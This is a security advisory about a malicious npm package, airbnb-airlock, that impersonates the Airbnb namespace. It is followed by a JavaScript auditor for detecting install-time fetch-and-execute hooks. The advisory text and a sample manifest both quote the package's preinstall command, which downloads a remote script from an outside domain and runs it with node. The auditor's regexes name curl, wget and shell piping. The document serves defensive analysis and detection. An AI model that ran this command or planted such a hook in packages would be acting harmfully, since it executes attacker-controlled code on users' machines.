
MAL-2026-6293

Malicious code in airbnb-airlock (npm)

Details


## Source: amazon-inspector (034fd98a2ccd98f2bec2201d130c5a102ad17907c37af34b5162592e26a0fd43)

The package's preinstall lifecycle hook in package.json runs `curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js`, fetching an unpinned JavaScript file from poc.amanrawat.com and immediately executing it with node during `npm install`. The fetched content is mutable and entirely controlled by the operator of that domain: installers run whatever bytes are served at install time, with no hash or signature verification. The package ships no other functional content; the remote fetch-and-execute is its only behavior. The package name uses the 'airbnb-' prefix to impersonate the Airbnb open-source namespace while being published by an unrelated author with a placeholder description ('Test') and an inflated version (99.0.0), consistent with namespace impersonation intended to lure installers searching for Airbnb tooling.
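The two behaviours this record describes, an install-time fetch-and-execute lifecycle hook and a namespace-impersonation profile (brand prefix, placeholder description, inflated version, no functional content), can both be checked from a package manifest before anything is installed. The following is an added example written for this page; it is not part of the record, of Amazon Inspector, or of any npm tooling. The sample manifest is constructed from the values quoted in the record; the `author` field, the brand-prefix list, the trusted-publisher list and the "inflated version" threshold are assumptions chosen for illustration.

```javascript
// Added example: static pre-install audit of an npm package.json for
// install-time fetch-and-execute hooks and namespace-impersonation signals.

// Lifecycle scripts npm runs automatically on install or publish.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];

// Heuristics for "download something, then run it" inside a script line.
const NETWORK_FETCH = /\b(curl|wget|Invoke-WebRequest|iwr)\b/i;
const REMOTE_URL = /https?:\/\/[^\s'"]+/gi;
const EXECUTES_FETCHED = /(\|\s*(sh|bash|node)\b|&&\s*(node|sh|bash)\s+\S+)/i;

// Descriptions that suggest a throwaway or placeholder package (assumed list).
const PLACEHOLDER_DESCRIPTIONS = new Set(["", "test", "todo", "description", "tbd"]);
const INFLATED_MAJOR_VERSION = 50; // assumed threshold for "version number chosen to sort first"

// Returns one finding per lifecycle hook that touches the network.
function auditLifecycleScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const urls = cmd.match(REMOTE_URL) || [];
    const fetches = NETWORK_FETCH.test(cmd);
    const executes = EXECUTES_FETCHED.test(cmd);
    if (fetches && executes) {
      findings.push({ hook, severity: "critical", reason: "remote fetch-and-execute at install time", urls, command: cmd });
    } else if (fetches || urls.length) {
      findings.push({ hook, severity: "warning", reason: "network access during install", urls, command: cmd });
    }
  }
  return findings;
}

// Returns human-readable signals that the package is impersonating a known namespace.
// opts.brandPrefixes: prefixes worth scrutinising; opts.trustedPublishers: maintainers
// allowed to use them; opts.tarballFiles: file list from the published tarball (optional).
function namespaceImpersonationSignals(pkg, opts) {
  const { brandPrefixes = [], trustedPublishers = [], tarballFiles = [] } = opts || {};
  const signals = [];
  const name = String(pkg.name || "");
  const prefix = brandPrefixes.find((p) => name.startsWith(p));
  const publisher = pkg.author && (typeof pkg.author === "string" ? pkg.author : pkg.author.name);
  if (prefix && !trustedPublishers.includes(publisher)) {
    signals.push(`name uses brand prefix '${prefix}' but publisher '${publisher}' is not a known maintainer`);
  }
  if (PLACEHOLDER_DESCRIPTIONS.has(String(pkg.description || "").trim().toLowerCase())) {
    signals.push("placeholder description");
  }
  const major = parseInt(String(pkg.version || "0").split(".")[0], 10);
  if (Number.isFinite(major) && major >= INFLATED_MAJOR_VERSION) {
    signals.push(`inflated version ${pkg.version}`);
  }
  const code = tarballFiles.filter((f) => f !== "package.json" && !/^(readme|license)/i.test(f));
  if (tarballFiles.length && code.length === 0) {
    signals.push("tarball ships no functional content besides package.json");
  }
  return signals;
}

// Combine both checks into a policy decision a CI gate could act on.
function verdict(pkg, opts) {
  const findings = auditLifecycleScripts(pkg);
  const signals = namespaceImpersonationSignals(pkg, opts);
  if (findings.some((f) => f.severity === "critical")) return "block";
  if (findings.length || signals.length >= 2) return "review";
  return "allow";
}

// Constructed manifest mirroring the values in this record (author is a placeholder).
const SAMPLE_MANIFEST = {
  name: "airbnb-airlock",
  version: "99.0.0",
  description: "Test",
  author: "example-author",
  scripts: { preinstall: "curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js" },
};
// Constructed benign manifest for contrast.
const BENIGN_MANIFEST = {
  name: "my-tooling",
  version: "1.2.3",
  description: "Internal setup helper",
  scripts: { postinstall: "node scripts/setup.js" },
};
// Assumed policy: scrutinise the airbnb- prefix; no publishers trusted with it here.
const SAMPLE_OPTS = { brandPrefixes: ["airbnb-"], trustedPublishers: [], tarballFiles: ["package.json"] };

console.log(verdict(SAMPLE_MANIFEST, SAMPLE_OPTS), JSON.stringify(auditLifecycleScripts(SAMPLE_MANIFEST)));
console.log(verdict(BENIGN_MANIFEST, SAMPLE_OPTS));
```

Run it against the manifest from `npm view <pkg> --json` or from an extracted `npm pack` tarball before installation. The heuristics are deliberately coarse; they exist to route a package to human review, not to replace it. Independently of any scanner, installing with `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) prevents lifecycle hooks such as the preinstall command in this record from running at all.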


Affected packages

npm / airbnb-airlock

No fixed version published yet for airbnb-airlock (npm). Pin to a known-safe version or switch to an alternative.

References